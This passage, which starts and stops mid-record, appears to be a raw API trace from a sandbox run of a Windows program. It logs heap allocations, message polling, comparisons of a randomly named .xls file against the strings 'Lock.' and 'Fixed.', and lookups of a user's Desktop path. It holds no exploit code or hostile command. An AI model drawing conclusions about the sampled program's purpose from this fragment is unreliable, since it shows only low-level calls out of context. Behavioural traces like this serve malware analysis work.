(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0090.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0090.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0090.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0090.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.288] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0090.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0090.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0090.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0090.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eacUdxJuUDfuA061.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="acUdxJuUDfuA061.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cUdxJuUDfuA061.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UdxJuUDfuA061.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dxJuUDfuA061.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xJuUDfuA061.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JuUDfuA061.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uUDfuA061.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UDfuA061.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DfuA061.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fuA061.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uA061.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A061.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="061.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="61.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.289] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.xls", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0090.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0090.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0090.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0090.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0090.289] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0090.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0090.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0090.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0090.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0090.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0090.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0090.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0090.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0090.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2a) returned 0x2aa61e8 [0090.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eacUdxJuUDfuA061.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="acUdxJuUDfuA061.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cUdxJuUDfuA061.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UdxJuUDfuA061.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dxJuUDfuA061.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xJuUDfuA061.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JuUDfuA061.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uUDfuA061.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UDfuA061.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DfuA061.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fuA061.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uA061.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A061.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="061.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.290] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="61.xls", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6178 [0090.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6178 | out: hHeap=0x2af0000) returned 1 [0090.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0090.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0090.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0090.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0090.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0090.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0090.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0090.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0090.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.291] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0090.291] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0090.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0090.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71db8 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0090.291] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0090.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0090.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0090.292] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6370 [0090.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0090.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0090.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a751c8 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6370 | out: hHeap=0x2af0000) returned 1 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0090.292] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0090.292] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0090.293] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0090.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0090.293] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6178 [0090.293] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0090.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0090.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0090.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0090.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0090.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0090.293] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0090.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6178 | out: hHeap=0x2af0000) returned 1 [0090.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0090.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0090.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0090.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71e88 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0090.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ea8 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0090.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0090.294] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.294] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0090.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0090.295] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0090.295] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0090.295] RtlAllocateHeap 